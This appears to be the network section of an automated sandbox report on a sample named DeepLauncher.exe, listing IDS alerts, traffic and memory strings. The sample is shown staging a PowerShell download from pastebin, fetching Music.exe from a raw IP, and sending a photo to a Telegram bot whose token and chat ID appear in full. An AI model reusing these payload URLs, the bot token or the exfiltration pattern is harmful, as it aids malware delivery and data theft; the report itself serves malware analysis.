Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49886 -> 208.95.112.1:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49912 -> 72.5.43.195:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49705 -> 104.20.3.235:443
Source: global trafficHTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.195
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.195
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.195
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.195
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.195
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.195
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/WHKzW2nr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
Source: global trafficHTTP traffic detected: GET /Music.exe HTTP/1.1Host: 72.5.43.195
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ip-api.com
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: unknownHTTP traffic detected: POST /bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712415 HTTP/1.1Host: api.telegram.orgContent-Type: multipart/form-data; boundary="8d5826e4-873e-4468-9dee-7b0d8e150bbe"Content-Length: 681707
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 18:47:07 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 273Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 37 32 2e 35 2e 34 33 2e 31 39 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 72.5.43.195 Port 80</address></body></html>
Source: DeepLauncher.exeString found in binary or memory: http://.css
Source: DeepLauncher.exeString found in binary or memory: http://.jpg
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F33306F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.195/Music.exe
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330E8000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F333123000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F333119000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332867000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F33310F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.195/Music.exe:
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.195:80/8
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33306F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33306F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org0
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33306F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/8
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33303A000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgnotification_sent.flag
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330E8000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330C9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org:443/8
Source: powershell.exe, 00000004.00000002.1576562741.0000017EC73C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
Source: powershell.exe, 00000004.00000002.1576562741.0000017EC73C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
Source: DeepLauncher.exeString found in binary or memory: http://html4/loose.dtd
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/8
Source: DeepLauncher.exe, 00000000.00000003.1734138389.00000233CD89F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0/sTy
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c.0/ti
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.hotosh
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adoraw-se
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.dob
Source: DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.photo/
Source: powershell.exe, 00000004.00000002.1519392910.0000017EBEC63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1485723590.00000220C1B73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1585638365.0000024112EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1585638365.0000024112D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1386081536.00000241042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.dataconX
Source: DeepLauncher.exe, 00000000.00000002.2567540441.00000233C5FA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F333098000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer8
Source: powershell.exe, 00000004.00000002.1379163538.0000017EAEE18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1373268730.00000220B1D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2567540441.00000233C5FA0000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1379163538.0000017EAEBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1373268730.00000220B1B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1386081536.0000024102CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1663607272.00000174AB311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: powershell.exe, 00000004.00000002.1379163538.0000017EAEE18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1373268730.00000220B1D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1522901895.00000220C9EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000006.00000002.1531770760.00000220C9FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1534008835.00000220CA137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000006.00000002.1531770760.00000220C9FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co5
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A1F000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
Source: DeepLauncher.exeString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2567540441.00000233C5FA0000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A1F000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
Source: DeepLauncher.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: DeepLauncher.exeString found in binary or memory: https://aka.ms/dotnet/download
Source: DeepLauncher.exeString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: DeepLauncher.exeString found in binary or memory: https://aka.ms/dotnet/info
Source: DeepLauncher.exeString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000004.00000002.1379163538.0000017EAEBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1373268730.00000220B1B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1386081536.0000024102CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1663607272.00000174AB311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/systemdrawingnonwindows
Source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C71A6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/winforms-warnings/
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330C9000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F33303A000.00000004.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendPhoto?chat_id=
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330E8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendMessage(
Source: DeepLauncher.exe, 00000000.00000002.2563983126.000001F3330C9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712
Source: powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.1663607272.00000174AB539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: DeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5C73000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C71A6000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/winforms
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000008.00000002.1386081536.0000024103922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gunaframework.com/api/licensing.phpPe
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gunaui.com/
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gunaui.com/api/licensing.php
Source: DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gunaui.com/pricing
